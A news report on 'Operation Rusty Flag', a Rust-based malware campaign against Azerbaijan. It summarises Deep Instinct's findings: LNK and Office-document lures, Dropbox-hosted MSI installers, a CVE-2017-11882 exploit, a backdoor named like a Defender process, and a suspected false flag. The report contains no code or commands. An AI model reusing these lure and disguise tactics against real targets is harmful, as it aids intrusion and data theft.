In a recent cybersecurity development, a new campaign named “Operation Rusty Flag” has emerged, with Azerbaijan being the primary target of a sophisticated Rust-based malware deployment. Cybersecurity experts from Deep Instinct have been closely monitoring this operation, which has not been directly associated with any known threat actor or group. This campaign exhibits a high level of complexity, featuring at least two distinct initial access vectors.
One particularly noteworthy aspect is the use of a modified document previously employed by the Storm-0978 group, raising suspicions of a potential “false flag” operation.
The attack chain within Operation Rusty Flag is multifaceted, utilizing an LNK file named 1.KARABAKH.jpg.lnk as a launchpad to access a second-stage MSI installer hosted on Dropbox. This installer, upon execution, deploys a Rust-written implant, an XML file for scheduling tasks to execute the implant, and a decoy image file adorned with watermarks of the Azerbaijan Ministry of Defense symbol.
An alternative infection vector involves a Microsoft Office document titled “Overview_of_UWCs_UkraineInNATO_campaign.docx,” exploiting a six-year-old memory corruption vulnerability (CVE-2017-11882) in Microsoft Office’s Equation Editor. This leverages a Dropbox URL to introduce a different MSI file, serving a variant of the same Rust backdoor.
Notably, the use of “Overview_of_UWCs_UkraineInNATO_campaign.docx” as a lure is significant, as it bears the same filename previously utilized by Storm-0978 in recent cyberattacks targeting Ukraine, capitalizing on an Office remote code execution flaw (CVE-2023-36884). This similarity suggests an intentional attempt to mislead and attribute the attack to Storm-0978, indicating a potential false flag operation.
The Rust-based backdoor, one of which disguises itself as “WinDefenderHealth.exe,” possesses the ability to gather data from compromised systems and transmit it to a server controlled by the attackers.
While the precise objectives of Operation Rusty Flag remain uncertain, there is speculation that it may be a red team exercise, testing the waters with this evolving malware. Security experts note that Rust is gaining popularity among malware authors, and existing security products struggle to accurately detect Rust-based threats due to the complexity of reverse engineering involved in identifying such malware.
